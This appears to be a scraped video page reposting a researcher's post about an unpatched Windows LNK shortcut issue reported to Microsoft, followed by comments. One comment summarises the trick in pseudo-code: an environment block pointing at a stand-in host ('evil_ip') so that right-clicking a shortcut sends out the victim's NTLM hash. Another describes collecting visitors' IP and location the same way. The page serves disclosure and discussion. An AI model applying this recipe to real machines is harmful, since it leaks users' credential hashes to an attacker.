Video wird geladen...

Video konnte nicht geladen werden

Zur Startseite

A quick writeup on potential security issue of Windows LNK that I reported to MSRC last month. They decided to not fix due to relying on MOTW. In the blog I included the proof of concept. All you have to do is to Right-Click and get Info Disclosure :)

25,240 Aufrufe • vor 1 Jahr •via X (Twitter)

11 Kommentare

Profilbild von sixtyvividtails
sixtyvividtailsvor 1 Jahr

Nice seeing actual dig into details of .LNK structure! tag/TLDR: lnk.header.flags |= HAS_EXP_STRING; 🤭 lnk.envarBlock := "\\evil_ip\gibe_hash" then right-click to sendout the ntlm hash

Profilbild von nafiez
nafiezvor 1 Jahr

Thanks 🫡

Profilbild von WAGMI | Crypto, DeFi & Web3 News
WAGMI | Crypto, DeFi & Web3 Newsvor 2 Jahren

"My friends think I'm a crypto genius, (I'm not) it's because I read WAGMI’s weekly newsletter (and they have no idea it exists)" - Every Crypto Degen

Profilbild von I am Jakoby
I am Jakobyvor 1 Jahr

I did something similar but I passed an http oob url and used it to collect their ip address, geolocation, and finger print info This is significantly more severe and I am honestly shocked they decided not to fix it

Profilbild von nafiez
nafiezvor 1 Jahr

That sounds awesome! Have you write or publish anything about the stuff you work on? Yeah too bad they didn’t treat this as security issue since MOTW did the protection, according to them :-)

Profilbild von ClearSky Cyber Security
ClearSky Cyber Securityvor 1 Jahr

Open since June 24

Profilbild von nafiez
nafiezvor 1 Jahr

The description looks similar however in your advisory seems to tie with CVE-2024-43451. How come this still not fix for the Right-Click? Any thoughts?

Profilbild von jcatblackhat
jcatblackhatvor 1 Jahr

TAG: PoC

Profilbild von Jean
Jeanvor 1 Jahr

What's the app you use for function tracing?

Profilbild von nafiez
nafiezvor 1 Jahr

I’m using Rohitab API Monitor

Profilbild von Bruno
Brunovor 1 Jahr

@BriPwn

Ähnliche Videos